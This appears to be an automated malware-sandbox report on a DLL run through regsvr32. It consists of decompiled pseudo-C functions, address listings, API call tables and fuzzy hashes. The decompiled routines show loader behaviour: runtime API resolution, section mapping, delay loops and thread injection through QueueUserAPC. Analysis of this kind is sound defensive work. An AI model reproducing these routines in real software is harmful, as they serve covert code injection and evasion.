                                    			E001A6632(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t34;
				signed int _t41;

				_t34 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x1aa290 = _t14;
				if(_t14 != 0) {
					 *0x1aa180 = GetTickCount();
					_t16 = E001A6707(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
						_push(0);
						_push(0x13);
						_push(_t29 >> 5);
						_push(_t20);
						L001A7F3A();
						_t41 = _t18 + _t20;
						_t22 = E001A1228(_a4, _t41);
						_t23 = 3;
						Sleep(_t23 << (_t41 & 0x00000007));
					} while (_t22 == 1);
					_t25 =  *0x1aa2ac; // 0x190
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32); // executed
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x1aa2b8 = 1; // executed
						}
					}
					_t16 = E001A5DCD(_t34); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















                                    0x001a6632
                                    0x001a6647
                                    0x001a664f
                                    0x001a6654
                                    0x001a6667
                                    0x001a666c
                                    0x001a6673
                                    0x001a66fe
                                    0x001a6704
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a6679
                                    0x001a6679
                                    0x001a667e
                                    0x001a6684
                                    0x001a668a
                                    0x001a6694
                                    0x001a6698
                                    0x001a6699
                                    0x001a669e
                                    0x001a669f
                                    0x001a66a0
                                    0x001a66a5
                                    0x001a66ab
                                    0x001a66b6
                                    0x001a66bd
                                    0x001a66c3
                                    0x001a66c8
                                    0x001a66cf
                                    0x001a66d3
                                    0x001a66db
                                    0x001a66e3
                                    0x001a66e5
                                    0x001a66e5
                                    0x001a66ed
                                    0x001a66ef
                                    0x001a66ef
                                    0x001a66ed
                                    0x001a66f9
                                    0x00000000
                                    0x001a66f9
                                    0x001a6658
                                    0x00000000

                                    APIs
                                    • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001), ref: 001A6647
                                    • GetTickCount.KERNEL32(?,00000001), ref: 001A665E
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 001A667E
                                    • SwitchToThread.KERNEL32(?,00000001), ref: 001A6684
                                    • _aullrem.NTDLL(?,?,00000013,00000000), ref: 001A66A0
                                    • Sleep.KERNEL32(00000003,00000000,?,00000001), ref: 001A66BD
                                    • IsWow64Process.KERNEL32(00000190,?,?,00000001), ref: 001A66DB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                    • String ID:
                                    • API String ID: 3690864001-0
                                    • Opcode ID: 1b2813f47edca1570188c8ab0da0dc44722f9e9097376410a6b872997be39bde
                                    • Instruction ID: f4ee79164fe976048509c7fa318943530e2b3f2384e5544f3af732f642628da5
                                    • Opcode Fuzzy Hash: 1b2813f47edca1570188c8ab0da0dc44722f9e9097376410a6b872997be39bde
                                    • Instruction Fuzzy Hash: 5A21A2B6604304AFC710AFA5EC89A6A77ECEB463A4F54463EF619C2550E735C8C4CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A637D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 64%
                                    			E001A637D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x1aa2d4; // 0x314d7d0
				_t1 = _t9 + 0x1ab61b; // 0x253d7325
				_t36 = 0;
				_t28 = E001A2F3E(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x32f9859
					_t40 = E001A77D7(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E001A488A(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E001A77EC(_t40);
						_t42 = E001A1F34(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E001A77EC(_t36);
							_t36 = _t42;
						}
						_t43 = E001A6006(_t36, _t33);
						if(_t43 != 0) {
							E001A77EC(_t36);
							_t36 = _t43;
						}
					}
					E001A77EC(_t28);
				}
				return _t36;
			}
















                                    0x001a637d
                                    0x001a6380
                                    0x001a6381
                                    0x001a6388
                                    0x001a638f
                                    0x001a6396
                                    0x001a639a
                                    0x001a63a1
                                    0x001a63a8
                                    0x001a63ad
                                    0x001a63b5
                                    0x001a63bf
                                    0x001a63c3
                                    0x001a63c7
                                    0x001a63cd
                                    0x001a63d2
                                    0x001a63dc
                                    0x001a63e2
                                    0x001a63e4
                                    0x001a63fb
                                    0x001a63ff
                                    0x001a6402
                                    0x001a6407
                                    0x001a6407
                                    0x001a6410
                                    0x001a6414
                                    0x001a6417
                                    0x001a641c
                                    0x001a641c
                                    0x001a6414
                                    0x001a641f
                                    0x001a6424
                                    0x001a642a

                                    APIs
                                      • Part of subcall function 001A2F3E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001A6396,253D7325,00000000,00000000,?,00000000,001A72E3), ref: 001A2FA5
                                      • Part of subcall function 001A2F3E: sprintf.NTDLL ref: 001A2FC6
                                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63A8
                                    • lstrlen.KERNEL32(00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63B0
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • strcpy.NTDLL ref: 001A63C7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A63D2
                                      • Part of subcall function 001A488A: lstrlen.KERNEL32(00000000,00000000,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000,001A72E3,00000000,032F9858), ref: 001A489B
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    • StrTrimA.SHLWAPI(00000000,=), ref: 001A63EF
                                      • Part of subcall function 001A1F34: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,001A63FB,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A1F3E
                                      • Part of subcall function 001A1F34: _snprintf.NTDLL ref: 001A1F9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                    • String ID: =
                                    • API String ID: 2864389247-1428090586
                                    • Opcode ID: d7747a1801284a8b80a26c645935a27c26ba61c3a9e0bc1bf3810e4c5fde9ddf
                                    • Instruction ID: 8bf6f73d4844b0ed23a916e177aa33f8cf932b29e3d1e9d93d6e21544daa21c6
                                    • Opcode Fuzzy Hash: d7747a1801284a8b80a26c645935a27c26ba61c3a9e0bc1bf3810e4c5fde9ddf
                                    • Instruction Fuzzy Hash: 3B11087F6012257B87127BB89D89C6F37AD9F9B7603094015F504A7202DF79CD0287E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C2310, Relevance: 9.6, APIs: 1, Strings: 4, Instructions: 871COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentVariableW.KERNEL32(6E2D2C54,6E2F7270,00000747), ref: 6E2C2B6C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EnvironmentVariable
                                    • String ID: Hh/n$Hh/n$Hh/n$@/n
                                    • API String ID: 1431749950-535270782
                                    • Opcode ID: f63b7f15f736fea209288819a9ca910a68d64de919d64d5a4da6e080004eb9a7
                                    • Instruction ID: dc9a6c55ba6677a7f048176c3bcdf596a5d3d22773b235b844f8ab31100746e5
                                    • Opcode Fuzzy Hash: f63b7f15f736fea209288819a9ca910a68d64de919d64d5a4da6e080004eb9a7
                                    • Instruction Fuzzy Hash: E282C0B2958B168FCB44CF78D5D4559BBF2FB8A724F001A2DE486C7384D7349909CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C9AA1, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 539 6e2c9aa1-6e2c9aba 540 6e2c9abc-6e2c9acc call 6e2ca5be 539->540 541 6e2c9ad0-6e2c9ad5 539->541 540->541 551 6e2c9ace 540->551 543 6e2c9ad7-6e2c9adf 541->543 544 6e2c9ae2-6e2c9b06 MultiByteToWideChar 541->544 543->544 545 6e2c9b0c-6e2c9b18 544->545 546 6e2c9c99-6e2c9cac call 6e2c3395 544->546 548 6e2c9b6c 545->548 549 6e2c9b1a-6e2c9b2b 545->549 555 6e2c9b6e-6e2c9b70 548->555 552 6e2c9b2d-6e2c9b3c call 6e2cd1a0 549->552 553 6e2c9b4a-6e2c9b5b call 6e2c6950 549->553 551->541 558 6e2c9c8e 552->558 565 6e2c9b42-6e2c9b48 552->565 553->558 566 6e2c9b61 553->566 555->558 559 6e2c9b76-6e2c9b89 MultiByteToWideChar 555->559 563 6e2c9c90-6e2c9c97 call 6e2c9a81 558->563 559->558 562 6e2c9b8f-6e2c9ba1 call 6e2c7160 559->562 568 6e2c9ba6-6e2c9baa 562->568 563->546 570 6e2c9b67-6e2c9b6a 565->570 566->570 568->558 571 6e2c9bb0-6e2c9bb7 568->571 570->555 572 6e2c9bb9-6e2c9bbe 571->572 573 6e2c9bf1-6e2c9bfd 571->573 572->563 574 6e2c9bc4-6e2c9bc6 572->574 575 6e2c9bff-6e2c9c10 573->575 576 6e2c9c49 573->576 574->558 577 6e2c9bcc-6e2c9be6 call 6e2c7160 574->577 579 6e2c9c2b-6e2c9c3c call 6e2c6950 575->579 580 6e2c9c12-6e2c9c21 call 6e2cd1a0 575->580 578 6e2c9c4b-6e2c9c4d 576->578 577->563 592 6e2c9bec 577->592 582 6e2c9c4f-6e2c9c68 call 6e2c7160 578->582 583 6e2c9c87-6e2c9c8d call 6e2c9a81 578->583 579->583 591 6e2c9c3e 579->591 580->583 595 6e2c9c23-6e2c9c29 580->595 582->583 597 6e2c9c6a-6e2c9c71 582->597 583->558 596 6e2c9c44-6e2c9c47 591->596 592->558 595->596 596->578 598 6e2c9cad-6e2c9cb3 597->598 599 6e2c9c73-6e2c9c74 597->599 600 6e2c9c75-6e2c9c85 WideCharToMultiByte 598->600 599->600 600->583 601 6e2c9cb5-6e2c9cbc call 6e2c9a81 600->601 601->563
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,6E2C827C,00000000,?,?,?,6E2C9CF2,?,?,00000100), ref: 6E2C9AFB
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,6E2C9CF2,?,?,00000100,5EFC4D8B,?,?), ref: 6E2C9B81
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2C9C7B
                                    • __freea.LIBCMT ref: 6E2C9C88
                                      • Part of subcall function 6E2C6950: RtlAllocateHeap.NTDLL(00000000,?), ref: 6E2C6982
                                    • __freea.LIBCMT ref: 6E2C9C91
                                    • __freea.LIBCMT ref: 6E2C9CB6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0
                                    • Opcode ID: e83c18b4f71d7a34b906d3e461668c7d5b8583a2e9aad466ebe2a92572652056
                                    • Instruction ID: 9baaed2376f720976d03a87f1f08c6f70d633366449656492a4840322c0ac807
                                    • Opcode Fuzzy Hash: e83c18b4f71d7a34b906d3e461668c7d5b8583a2e9aad466ebe2a92572652056
                                    • Instruction Fuzzy Hash: 8351D27261021BAFEB948FA4CC41EAB37ABEF84F18F110728EC14D6140EB34DD60C696
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A165D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 604 6e2a165d-6e2a166f call 6e2a2102 607 6e2a1730 604->607 608 6e2a1675-6e2a16aa GetModuleHandleA GetProcAddress 604->608 611 6e2a1737-6e2a173e 607->611 609 6e2a1728-6e2a172e call 6e2a2117 608->609 610 6e2a16ac-6e2a16c0 GetProcAddress 608->610 609->611 610->609 612 6e2a16c2-6e2a16d6 GetProcAddress 610->612 612->609 614 6e2a16d8-6e2a16ec GetProcAddress 612->614 614->609 616 6e2a16ee-6e2a1702 GetProcAddress 614->616 616->609 617 6e2a1704-6e2a1715 call 6e2a2013 616->617 619 6e2a171a-6e2a171f 617->619 619->609 620 6e2a1721-6e2a1726 619->620 620->611
                                    C-Code - Quality: 100%
                                    			E6E2A165D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E2A2102(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e2a41d0 + 0x6e2a5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E2A2117(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E2A2013(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                    0x6e2a166b
                                    0x6e2a166f
                                    0x6e2a1730
                                    0x6e2a1675
                                    0x6e2a168d
                                    0x6e2a169c
                                    0x6e2a16a3
                                    0x6e2a16a7
                                    0x6e2a16aa
                                    0x6e2a1728
                                    0x6e2a1729
                                    0x6e2a16ac
                                    0x6e2a16b9
                                    0x6e2a16bd
                                    0x6e2a16c0
                                    0x00000000
                                    0x6e2a16c2
                                    0x6e2a16cf
                                    0x6e2a16d3
                                    0x6e2a16d6
                                    0x00000000
                                    0x6e2a16d8
                                    0x6e2a16e5
                                    0x6e2a16e9
                                    0x6e2a16ec
                                    0x00000000
                                    0x6e2a16ee
                                    0x6e2a16fb
                                    0x6e2a16ff
                                    0x6e2a1702
                                    0x00000000
                                    0x6e2a1704
                                    0x6e2a170a
                                    0x6e2a1710
                                    0x6e2a1715
                                    0x6e2a171c
                                    0x6e2a171f
                                    0x00000000
                                    0x6e2a1721
                                    0x6e2a1724
                                    0x6e2a1724
                                    0x6e2a171f
                                    0x6e2a1702
                                    0x6e2a16ec
                                    0x6e2a16d6
                                    0x6e2a16c0
                                    0x6e2a16aa
                                    0x6e2a173e

                                    APIs
                                      • Part of subcall function 6E2A2102: HeapAlloc.KERNEL32(00000000,?,6E2A13AF,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A210E
                                    • GetModuleHandleA.KERNEL32(?,00000020), ref: 6E2A1681
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16A3
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16B9
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16CF
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16E5
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16FB
                                      • Part of subcall function 6E2A2013: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74EC1222,00000000,00000000), ref: 6E2A2070
                                      • Part of subcall function 6E2A2013: memset.NTDLL ref: 6E2A2092
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                    • String ID:
                                    • API String ID: 1632424568-0
                                    • Opcode ID: 96e6eb19699302e960186b9b28e13c66adc1322094157cda4a8a229fb5450125
                                    • Instruction ID: 0d26a908ec421bef6b339d921a8f9e5563fbea3e0a8e9d3cc9e2b0ad54048e5f
                                    • Opcode Fuzzy Hash: 96e6eb19699302e960186b9b28e13c66adc1322094157cda4a8a229fb5450125
                                    • Instruction Fuzzy Hash: 6A2167F560060A9FDB40DFADCC84E6A77EEEB49354B001525EA94E7200E730E90ACBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A17C4, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e2a4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e2a418c;
						if( *0x6e2a418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e2a4198;
								if( *0x6e2a4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e2a418c);
						}
						HeapDestroy( *0x6e2a4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e2a4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6e2a4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e2a41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E2A1000(E6E2A1FC9, E6E2A19C4(_a12, 1, 0x6e2a4198, _t41));
							 *0x6e2a418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                    0x6e2a17c7
                                    0x6e2a17d3
                                    0x6e2a17d5
                                    0x6e2a17d8
                                    0x6e2a184e
                                    0x6e2a1854
                                    0x6e2a1856
                                    0x6e2a1858
                                    0x6e2a185e
                                    0x6e2a1860
                                    0x6e2a1865
                                    0x6e2a1868
                                    0x6e2a1873
                                    0x6e2a1875
                                    0x00000000
                                    0x00000000
                                    0x6e2a1877
                                    0x6e2a187a
                                    0x6e2a187c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a187c
                                    0x6e2a1884
                                    0x6e2a1884
                                    0x6e2a1890
                                    0x6e2a1890
                                    0x6e2a17da
                                    0x6e2a17db
                                    0x6e2a17fb
                                    0x6e2a1801
                                    0x6e2a1803
                                    0x6e2a1808
                                    0x6e2a1844
                                    0x6e2a1844
                                    0x6e2a180a
                                    0x6e2a1812
                                    0x6e2a1819
                                    0x6e2a1823
                                    0x6e2a182f
                                    0x6e2a1836
                                    0x6e2a183b
                                    0x6e2a1840
                                    0x00000000
                                    0x6e2a1840
                                    0x6e2a183b
                                    0x6e2a1808
                                    0x6e2a17db
                                    0x6e2a189d

                                    APIs
                                    • InterlockedIncrement.KERNEL32(6E2A4188), ref: 6E2A17E6
                                    • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6E2A17FB
                                      • Part of subcall function 6E2A1000: CreateThread.KERNEL32(00000000,00000000,00000000,?,6E2A4198,6E2A1834), ref: 6E2A1017
                                      • Part of subcall function 6E2A1000: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6E2A102C
                                      • Part of subcall function 6E2A1000: GetLastError.KERNEL32(00000000), ref: 6E2A1037
                                      • Part of subcall function 6E2A1000: TerminateThread.KERNEL32(00000000,00000000), ref: 6E2A1041
                                      • Part of subcall function 6E2A1000: CloseHandle.KERNEL32(00000000), ref: 6E2A1048
                                      • Part of subcall function 6E2A1000: SetLastError.KERNEL32(00000000), ref: 6E2A1051
                                    • InterlockedDecrement.KERNEL32(6E2A4188), ref: 6E2A184E
                                    • SleepEx.KERNEL32(00000064,00000001), ref: 6E2A1868
                                    • CloseHandle.KERNEL32 ref: 6E2A1884
                                    • HeapDestroy.KERNEL32 ref: 6E2A1890
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                    • String ID:
                                    • API String ID: 2110400756-0
                                    • Opcode ID: 623b7cf9f5f29fe5cdca112f896d571793b8378202abc7ddf01f9410e82828be
                                    • Instruction ID: bfdf2b3ed9db63ad9087cf375e07e1fb800f26968b5eb72f225da6a801783f13
                                    • Opcode Fuzzy Hash: 623b7cf9f5f29fe5cdca112f896d571793b8378202abc7ddf01f9410e82828be
                                    • Instruction Fuzzy Hash: AB216DB1A0060EEFDB409FEDC88C95D7BABFB563B27154465E615D3140DB70C98ACB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1000, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E6E2A1000(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e2a41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                    0x6e2a1017
                                    0x6e2a101d
                                    0x6e2a1021
                                    0x6e2a102c
                                    0x6e2a1034
                                    0x6e2a103d
                                    0x6e2a1041
                                    0x6e2a1048
                                    0x6e2a104f
                                    0x6e2a1051
                                    0x6e2a1057
                                    0x6e2a1034
                                    0x6e2a105b

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,00000000,?,6E2A4198,6E2A1834), ref: 6E2A1017
                                    • QueueUserAPC.KERNEL32(?,00000000,?), ref: 6E2A102C
                                    • GetLastError.KERNEL32(00000000), ref: 6E2A1037
                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6E2A1041
                                    • CloseHandle.KERNEL32(00000000), ref: 6E2A1048
                                    • SetLastError.KERNEL32(00000000), ref: 6E2A1051
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                    • String ID:
                                    • API String ID: 3832013932-0
                                    • Opcode ID: 27b50cf6482c7e2aaf85893c68aa2be8a5e29ca39df46a807078fbffa498f446
                                    • Instruction ID: 2e96305cfc7e73b7cda5bda9b167327fa8c8164860f73c3eab10c3b5f039cd38
                                    • Opcode Fuzzy Hash: 27b50cf6482c7e2aaf85893c68aa2be8a5e29ca39df46a807078fbffa498f446
                                    • Instruction Fuzzy Hash: F3F08C32204E21FBCB225BA88C0CF4FBF6BFB0A722F014404FA0991040C7B18858DBB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C30D0, Relevance: 6.2, APIs: 4, Instructions: 188COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000747), ref: 6E2C3111
                                    • GetConsoleWindow.KERNEL32 ref: 6E2C3151
                                    • ShowWindow.USER32(00000000), ref: 6E2C3158
                                    • OpenMutexW.KERNEL32(001F0001,00000001,6E30C4C0,00000000,00000000), ref: 6E2C31C6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Window$ConsoleDirectoryMutexOpenShowSystem
                                    • String ID:
                                    • API String ID: 3443828520-0
                                    • Opcode ID: 0c6665df6eedfab903509f83552bbcb89350681b8aacdd18e3431a624f3cc3df
                                    • Instruction ID: c94bce9e671e558abe384574376b1be114c2007e7df0f8c44be863a388b6de4d
                                    • Opcode Fuzzy Hash: 0c6665df6eedfab903509f83552bbcb89350681b8aacdd18e3431a624f3cc3df
                                    • Instruction Fuzzy Hash: AE718A71AA0A158FDB00CF79E5DD5A97BF3FB46B247000A2AD84787354E774A409CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

